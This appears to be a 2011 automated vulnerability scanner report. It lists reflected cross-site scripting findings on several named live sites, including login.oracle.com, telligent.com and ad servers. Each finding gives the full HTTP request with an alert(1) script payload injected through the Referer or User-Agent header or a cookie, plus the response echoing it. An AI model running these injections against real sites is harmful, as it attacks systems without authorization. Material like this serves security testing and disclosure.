Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=register HTTP/1.1 Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:21 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=0rvu9xpQXsuNNX5uqSg34XHsQnJPAPazjTKeFaBUv5dhOISD2nsl!865718048; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close
<!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... t 100%. useful to restrict content of two column reg page middlecolumn: # of pixels for middle column. default is 4. fyi: your user-agent string is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b --> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f59"><script>alert(1)</script>a68788fd6cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername= HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Template file taken from conftest --> <!DOCTYPE HTML PUB ...[SNIP]... <a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd" class="boldbodylink"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c91e7"><script>alert(1)</script>8e874b658df was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Template file taken from conftest --> <!DOCTYPE HTML PUB ...[SNIP]... <a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df" class="boldbodylink"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20662"><script>alert(1)</script>4f1a3620730 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/request_a_demo.aspx HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a57+GMT; expires=Sun, 26-Feb-2012 23:21:57 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:21:57 GMT Connection: close Content-Length: 66403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 137cc"><script>alert(1)</script>610a59d58cb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources/m/analysts/1343205.aspx HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a27+GMT; expires=Sun, 26-Feb-2012 23:22:27 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:27 GMT Connection: close Content-Length: 64261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc8d"><script>alert(1)</script>3a0b6097669 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources/m/analysts/1345217.aspx HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a36+GMT; expires=Sun, 26-Feb-2012 23:22:36 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:36 GMT Connection: close Content-Length: 64972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad044"><script>alert(1)</script>2b4dec818f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources/m/success_stories/1331597.aspx HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a43+GMT; expires=Sun, 26-Feb-2012 23:22:43 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:43 GMT Connection: close Content-Length: 64200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cdbf"><script>alert(1)</script>e4ccb6eed44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/request_an_upgrade/ HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a35+GMT; expires=Sun, 26-Feb-2012 23:23:35 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:23:35 GMT Connection: close Content-Length: 61451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 169d7'-alert(1)-'05e31362016 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /en/ HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:36:30 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-aae30c915a39ee69d50753ca20be732f" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 18320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016::en'); var serverRef = encodeURIComponent('http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016'); if(document && document.referrer){ jsRef = encodeURIComponent(document.referre ...[SNIP]...
The value of the eyeblaster cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4de67%3balert(1)//33e2200b3e9 was submitted in the eyeblaster cookie. This input was echoed as 4de67;alert(1)//33e2200b3e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773834383&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838222/0/6/AdId=1468660;BnId=1;itime=773834383;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311144;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=4de67%3balert(1)//33e2200b3e9; A3=heSmakIJ0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload c13e0<script>alert(1)</script>edfc50278cb was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?fpc=30dea60-12e64e877f0-4b740973-1&purl=null&jsref= HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.5c108f5ecedf280ce5fe5e8db7e38332.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==c13e0<script>alert(1)</script>edfc50278cb
